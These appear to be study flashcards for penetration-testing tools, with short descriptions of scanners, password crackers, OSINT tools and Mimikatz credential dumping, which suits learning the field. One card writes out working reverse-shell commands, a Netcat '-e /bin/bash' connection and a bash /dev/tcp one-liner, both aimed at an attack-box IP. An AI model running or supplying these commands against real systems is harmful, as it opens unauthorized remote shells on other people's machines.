TOOLS Flashcards
BeEF
browser exploitation framework –> XSS & Injection
Netcat
TCP/UDP connections
Nikto
web application vulnerability scanner.
Androzer
test android apps
Swagger
API testing
open-source framework with large system of tools to design, build, doc, etc, REST Web Services
W3AF
open source we application security scanner
Shodan
cloud based tool for finding open ports and unpatched PCs
CeWL
CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. Optionally, CeWL can follow external links.
OpenVAS
open source vulnerability scanner
SET
social engineering toolkit
Reponder
Poisons LLMNR / NBT-NS/ MDNS traffic.
If a client/target cannot resolve a name via DNS it will fall back to name resolution via LLMNR (introduced in Windows Vista) and NBT-NS.
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses.
Mimikatz
a popular post-exploitation tool that dumps passwords, hashes, PINs, and Kerberos tickets from memory.
It also allows for pass-the-hash, pass-the-ticket, and the creation of Golden Kerberos tickets,
NCRACK
Ncrack is a very fast ONLINE password brute-force tool from the Nmap team.
But it can only be used for a limited set of protocols: • FTP • Telnet • SSH • RDP • VNC • HTTP(S) (basic authentication)
Hydra
Hydra is a brute-forcing tool that can crack systems using password guessing.
Maltego
OSINT
visualization of data relationships gathered from OSINT efforts.
Mimikatz
able to access the LSASS (Local Security Authority Subsystem Service) memory space and extract these clear-text credentials (crack passwords)
kerberos auth golden ticket
Credential testing tools
Hashcat Medusa Hydra CeWL John the Ripper Cain and Abel Mimikatz Patator Dirbuster W3AF
Harvester
OSINT
gathers emails, domains, hosts employee names, open ports, banners
Empire
powershell exploitation tool
Findbugs / Spotbugs
a static code analyzer for Java applications
tcpdump
a command-line exclusive tool that allows sniffing network traffic and packets
Reaver
cracks WPS enabled wifi router (get’s PIN)
Sqlmap
database vulnerability scanner
Hashcat
password cracking / recovery tool, one of the fastest because it also uses the power of the GPU as well as that of the classic CPU.
Reverse Shell
Netcat
nc –lvp 4444 ----> setup a Netcat listener on the attack box nc 192.168.100.113 4444 –e /bin/bash ----> issue the following command on the target host to connect to our attack box
Bash
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
IDA
interactive disassembler - and debugger
generates assembly language source code from machine-executable code. It supports a variety of executable formats for different processors and operating systems. It also can be used as a debugger for Windows PE, Mac OS X Mach-O, and Linux ELF executables. A decompiler plug-in for programs compiled with a C/C++ compiler is available at extra cost.
Software Assurance
Findbugs. - security audits java code
Peach. - fuzzing / dynamic
AFL. - american fuzzy lop = fuzer
SonarQube - static code analysis many languages
YASCA. - software scanner / fuzzing / plugins
Harvester
OSINT to collect email addresses
Vulnerability Scanners
Nikto OpenVAS Nessus sqlmap W3AF nmap metasploit
